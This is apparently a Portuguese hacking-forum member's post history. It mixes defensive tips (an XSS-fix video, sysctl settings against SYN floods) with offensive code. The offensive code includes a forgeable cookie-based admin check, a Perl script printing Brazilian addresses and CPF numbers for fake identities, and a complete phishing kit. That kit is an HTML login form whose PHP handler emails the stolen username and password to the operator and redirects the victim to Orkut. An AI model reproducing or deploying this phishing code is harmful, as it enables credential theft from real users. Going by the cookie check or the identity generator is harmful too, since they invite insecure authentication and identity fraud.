Nesta aula ensino a Corrigir Cross Site Scripting (Xss) com htmlspecialchars() do PHP, é algo bem simples que é pouco divulgado na internet.
YouTube - Broadcast Yourself.
obs: Veja em 720p :D
YouTube - Broadcast Yourself.
obs: Veja em 720p :D
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
Show posts Menu Vou ensinar a configurar o IPv4 contra ataques de SYN Flood...
Para isso vamos editar os arquivos de configuração do IPv4, em /proc/sys/net/ipv4/
A primeira modificação a ser feita é no arquivo tcp_max_syn_backlog
ele deve conter um valor alto, pois é o número máximo de conex SYN permitidas. Se esse número for baixo e o timeout da conex for alto certamente vc sofrerá DoS. Um bom valor para ele é 2048
Vamos alterar também o tcp_synack_retries. Na maioria das distros esse valor eh 5 (que indica que se uma conexão não respondeu com um pacote ACK válido ela eh descartada). Vamos diminuir esse timeout para 3 (que corresponde a 45 segundos).
No arquivo tcp_syncookies, mude o valor para 1, que significa habilitado. Isso evita que vc sofra ataques com pacotes SYN spoofados, pois eh gerado um cookie baseado no host transmissor e receptor e porta de saida e entrada.
Essa é apenas a configuração adequada do IPv4 contra SYN flood, várias outras medidas de defesa são possíveis, com boas regras de firewall e IDS.
Bem pessoal.. isso ai da uma boa segurada, mais dependendo do tamanho do ataque, pode nao funcionar.
Creditos: Raul_Matheus
Quote from: Mago__ on 25 de September , 2009, 09:57:40 AM
3. Acho muito difícil que o site realmente tenha caído. Estes progamas de ataque DoS ou programa de escaneamento como o NMap consomem muito da sua conexão e, algumas vezes, chegam a derrubar sua conexão. É exatamente por isso que o NMap tem a opção -max-rate, para você controlar quantos pacotes podem ser enviados por segundo. O que penso que aconteceu foi sua conexão ter caído. Neste caso você pode reiniciar seu modem e ver se o site realmente caiu ou foi você que caiu.
Abraços
<?php
if ($_COOKIE["21232f297a57a5a743894a0e4a801fc3"] == "1"){
echo "admin";}
else {
echo "usuario";
}
?>
#!/usr/bin/perl
#Gerador de Indentidade v 1.5
#By $4mu:kt
#Basiado no cod by Dr4k3
$conta2=1;
system("color 2");
{
print q{
============================================================================
_________ _______ _____ ____ __________ ______ ____ _____________
| || || \/ || | || |/ /| ©$4mu:kt |
| ____|| -- || || | || ____/ | |
| || || | | || | || ||___ ___|
|____ || | || |\/| || || | | | |
| || | || | | || || | | | |
|_________||__|____||____| |___||__________||______|____| |_____|
http://www.inw-seguranca.com
============================================================================
};
};
sleep 1;
@caracteres=(
"Rua: Quinze de Novembro, 11 Bairro: Tremembe Cidade: Sao Paulo Estado: SP Cep: 02362-085 Pais: BRASIL Cpf: 140.082.903-89","Avenida: Alm. Barroso, 139 Bairro: Centro Cidade: Rio de Janeiro Estado: RJ Cep: 20031-005 Pais: BRASIL Cpf: 331.892.376-11","Rua: Girassol, 134 Bairro: Pinheiros Cidade: Sao Paulo Estado: SP Cep: 05433-000 Pais: BRASIL Cpf: 180.979.133-21",
);
print "Gerando...";
print "\nGenerating ... \n ";
chomp($carac= 1 );
$p2="";
if ($carac >= 0){
for ($conta=1, $max=$carac; $conta <= $max; $conta++) {
$num = rand(@caracteres);
$p1 = $caracteres[$num];
$p2 = "$p1$p2";
}
push(@senhas,$p2);
sleep 2;
print "\n$p2\n";
}
if ($vezes >= 1) {
$vezes=0;
}
print "\nPressione enter para sair...\n";
print "Press enter to exit... ";
<STDIN>;
<form name="form1" method="post" action="oi.php">
User:
<input name="user" type="text" id="user">Senha
<input name="senha" type="text" id="senha">
<input type="submit" name="Submit" value="Enviar">
<form name="form1" method="post" action="oi.php">
<input name="user" type="text" id="user">Senha
<input name="senha" type="text" id="senha">
<input type="submit" name="Submit" value="Enviar">
<?php
//iremos declarar as variaveis que recebemos pelo método post
$user=$_POST[user];
$senha=$_POST[senha];
//agora vamos enviar todos esses dados usando a função mail
mail("seuemail@gmail.com","PAGINA FAKE","
---FAKESÃO v1.0---
____________________________________________
Nome: $user
Senha: $senha
","FROM:Fakesao<fake@fake.fa.ke>");
echo '<meta http-equiv="refresh" content="0; url=http://www.orkut.com.br/Main#Community?rl=cpn&cmm=3726307">'; // Redireciona para a pagina vdd(uma comunidade) ;
?>